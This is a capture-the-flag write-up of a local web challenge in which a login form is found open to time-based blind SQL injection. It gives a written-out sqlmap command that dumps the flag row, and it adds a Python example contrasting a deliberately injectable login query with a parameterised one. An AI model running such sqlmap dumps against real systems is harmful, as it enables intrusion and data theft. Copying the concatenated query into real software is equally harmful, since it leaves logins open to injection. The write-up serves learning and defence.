Challenge Files - Local Docker Webserver: web_toy_management.zip
Exploit Technique Used: Time-Based Blind SQL Injection with sqlmap
Details:
Upon connecting to the website, we're immediately greeted by a login portal, which is excellent because we normally have to enumerate to find such a portal:
cat web_toy_management/challenge/database.sql
-- Database: `toydb`
INSERT INTO `toylist` (`id`, `toy`, `receiver`, `location`, `approved`) VALUES
(1, 'She-Ra, Princess of Power', 'Elaina Love', 'Houston', 1),
(2, 'Bayblade Burst Evolution', 'Jarrett Pace', 'Dallas', 1),
(3, 'Barbie Dreamhouse Playset', 'Kristin Vang', 'Austin', 1),
(4, 'StarWars Action Figures', 'Jaslyn Huerta', 'Amarillo', 1),
(5, 'Hot Wheels: Volkswagen Beach Bomb', 'Eric Cameron', 'San Antonio', 1),
(6, 'Polly Pocket dolls', 'Aracely Monroe', 'El Paso', 1),
(7, 'HTB{f4k3_fl4g_f0r_t3st1ng}', 'HTBer', 'HTBland', 0);
It seems we get the flag if we can somehow query this database/table. I decided to use sqlmap to see if it can get us anything valuable. I loaded up Burp Suite to capture a legitimate POST request and copy+pasted it to a file called "post.txt" to feed into sqlmap:
IT FOUND SOMETHING! sqlmap discovered the username field is vulnerable to a time-based blind SQL injection attack. Since I already knew the database and table name, I went ahead and queried for it directly with sqlmap:
sqlmap -r post.txt --batch -D toydb -T toylist -C toy --where "id=7" --dump
# -r feeds in the POST request I pasted into post.txt
# --batch runs sqlmap non-interactively, answering "yes" to every prompt so it doesn't pause
# -D is the database name we want to query
# -T is the table name we want to query
# -C is the column of that table we want to query
# --where "id=7" tells sqlmap to dump only the row where the "id" field is 7 (the flag)
# --dump tells it to run the query and show us the results
VOILA! THE FLAG!
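As an added example (not code from the challenge or from the original post): the query-building pattern that makes a login field injectable, beside its parameterised form, in Python with sqlite3. The users table, its columns and the password value are assumptions; the toylist row is copied from the dump above.

```python
import sqlite3

# Constructed sample database: the toylist row from the challenge dump plus
# an ASSUMED users table (the page never shows the real login table).
SCHEMA = """
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'assumed-password');
CREATE TABLE toylist (id INTEGER, toy TEXT, receiver TEXT, location TEXT, approved INTEGER);
INSERT INTO toylist VALUES (7, 'HTB{f4k3_fl4g_f0r_t3st1ng}', 'HTBer', 'HTBland', 0);
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username, password):
    # The pattern sqlmap exploits: user input spliced into the SQL text,
    # so a quote in the username changes the structure of the statement.
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    # Parameterised query: values travel separately from the SQL text and
    # are only ever compared as data, whatever characters they contain.
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def probe(login):
    """Classify how a login function reacts to a username containing a quote.

    Returns 'ok' (row found), 'no-row' (clean miss) or 'error' (the input
    broke the SQL statement, the first symptom a scanner looks for).
    """
    conn = open_db()
    try:
        row = login(conn, "admin'", "x")
    except sqlite3.Error:
        return "error"
    return "ok" if row else "no-row"
```

Running probe() over both functions shows the difference a defender cares about: the concatenated query fails on the stray quote, while the parameterised one simply finds no matching user.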